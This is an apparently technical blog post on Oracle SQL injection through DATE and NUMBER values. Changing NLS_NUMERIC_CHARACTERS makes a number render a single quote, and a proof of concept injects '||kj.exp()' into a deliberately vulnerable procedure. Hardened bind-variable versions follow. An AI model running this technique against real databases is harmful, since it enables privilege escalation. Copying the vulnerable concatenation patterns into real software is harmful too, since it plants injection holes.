Personal opinion
- 2020-06-07 05:28:51
- OfStack
If the SQL statement is executed directly (static SQL) or with parameter binding, there is not much to worry about.
Take the following Oracle stored procedure:
```sql
create or replace procedure kjdatepoc(d date)
as
begin
  -- static SQL: d is passed as a DATE value, never as statement text
  insert into kjdatetable values(d);
  commit;
end;
/
```
There is no need to worry about this new kind of SQL injection here. So where can DATE and NUMBER injection happen? Generally, wherever dynamic SQL is used without parameter binding.
For example, DBMS_SQL and EXECUTE IMMEDIATE are commonly used by engineers.
Look at the following stored procedure:
```sql
create or replace procedure kjdatepoc(d date)
as
begin
  -- d is implicitly converted to text with the session's NLS_DATE_FORMAT
  -- and spliced into the statement instead of being bound
  execute immediate 'insert into kjdatetable values(' || d || ')';
  commit;
end;
/
```
If you come across a stored procedure or function like the one above, the session's NLS_DATE_FORMAT can also be modified to achieve SQL injection.
The foreign researcher's paper covers that in detail, so I won't repeat it here.
What it did not explain much is NUMBER injection. I'll just show you that a NUMBER can be made to print a single quote!
Look at the following statement:
```sql
-- decimal separator = single quote; the group separator ',' is assumed here,
-- the page's rendering of this value lost it
ALTER SESSION SET NLS_NUMERIC_CHARACTERS = ''',';
-- || '' forces the NUMBER to be converted to text with the session NLS settings
SELECT to_number(1000.10001, '999999D99999') || '' FROM DUAL;
```
It outputs one row:
```
1000'10001
```
It's just one extra single quote, so what's the point? Look on the bright side: in certain situations it is valuable. Look at the following stored procedure:
```sql
create or replace procedure NumInjPoc(kjexpnum number, kjexpstr varchar2)
is
  SecStr varchar2(1000);
begin
  -- only the VARCHAR2 argument is escaped: every single quote is doubled
  SecStr := replace(kjexpstr, '''', '''''');
  -- the NUMBER argument is spliced in unescaped, converted with the session's NLS_NUMERIC_CHARACTERS
  sys.dbms_output.put_line('SELECT * FROM DUAL WHERE ID=' || kjexpnum || ' and name=''' || SecStr || '''');
end;
/
```
The VARCHAR2 parameter is escaped internally. We can test it:
```sql
begin
  numinjpoc(1000, '''');  -- the string argument is a single quote
end;
/
```
The SQL statement it outputs is:
```
SELECT * FROM DUAL WHERE ID=1000 and name=''''
```
The single quote has been escaped.
So how do we combine this with the NUMBER parameter?
```sql
ALTER SESSION SET NLS_NUMERIC_CHARACTERS = ''',';
begin
  -- .10001 is rendered as '10001 once the decimal separator is a single quote
  numinjpoc(TO_NUMBER(0.10001, '999999D99999'), '||kj.exp()');
end;
/
```
Look at the output:
```
SELECT * FROM DUAL WHERE ID='10001 and name='||kj.exp()...
```
So the procedure can be attacked indirectly.
Because this technique depends on ALTER SESSION being run in the same session, it is mainly useful for attacking a function or procedure inside the database to escalate privileges. It is not a way to break in from outside, and for a single-statement, result-oriented SQL injection attack this approach does not add much.
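The fix for both procedures on this page is the same: never let the DATE or NUMBER argument pass through an implicit, session-controlled conversion into statement text. The following PL/SQL is an added example, not code from the original post. It rewrites kjdatepoc and NumInjPoc with bind variables (EXECUTE IMMEDIATE ... USING), and adds a helper for the rare case where a NUMBER genuinely has to be spliced into SQL text. The table kjtable(id number, name varchar2) is a hypothetical stand-in for the post's "FROM DUAL WHERE ID=" pseudo-query; kjdatetable is the post's own table.

```sql
-- Added example: hardened versions of the two procedures from the post.
-- Assumes the post's table kjdatetable(d date) and a hypothetical
-- table kjtable(id number, name varchar2(100)).

create or replace procedure kjdatepoc_safe(d date)
as
begin
  -- dynamic SQL with a bind variable: d travels as a DATE value and is
  -- never converted through NLS_DATE_FORMAT, so the session setting is irrelevant
  execute immediate 'insert into kjdatetable values(:1)' using d;
  commit;
end;
/

create or replace procedure numinjpoc_safe(kjexpnum number, kjexpstr varchar2)
as
  cnt pls_integer;
begin
  -- both values are bound; the statement text contains no user data, so
  -- neither NLS_NUMERIC_CHARACTERS nor quote escaping can influence the query
  execute immediate
    'select count(*) from kjtable where id = :1 and name = :2'
    into cnt
    using kjexpnum, kjexpstr;
  sys.dbms_output.put_line('matches: ' || cnt);
end;
/

-- If a NUMBER really must be rendered into SQL text (binding is not possible),
-- render it with an explicit format and an explicit NLS parameter so the
-- session's NLS_NUMERIC_CHARACTERS cannot change which characters appear.
create or replace function num_literal(n number) return varchar2
as
begin
  -- FM drops padding and trailing zeros; the third argument pins '.' and ','
  -- regardless of what ALTER SESSION has set
  return to_char(n, 'FM999999999999990D999999999', 'NLS_NUMERIC_CHARACTERS=''.,''');
end;
/

-- Demonstration: even after the post's ALTER SESSION, the helper still
-- renders 0.10001 with a '.' decimal separator, so no quote can appear.
ALTER SESSION SET NLS_NUMERIC_CHARACTERS = ''',';
begin
  sys.dbms_output.put_line('implicit: ' || 0.10001);        -- '10001
  sys.dbms_output.put_line('explicit: ' || num_literal(0.10001)); -- 0.10001
end;
/
```

For string arguments that cannot be bound, use sys.dbms_assert.enquote_literal rather than a hand-written replace; it both doubles embedded quotes and wraps the value in quotes, which is what the post's SecStr code was trying to do by hand. Binding remains the preferred option: the bound path has no text conversion to attack.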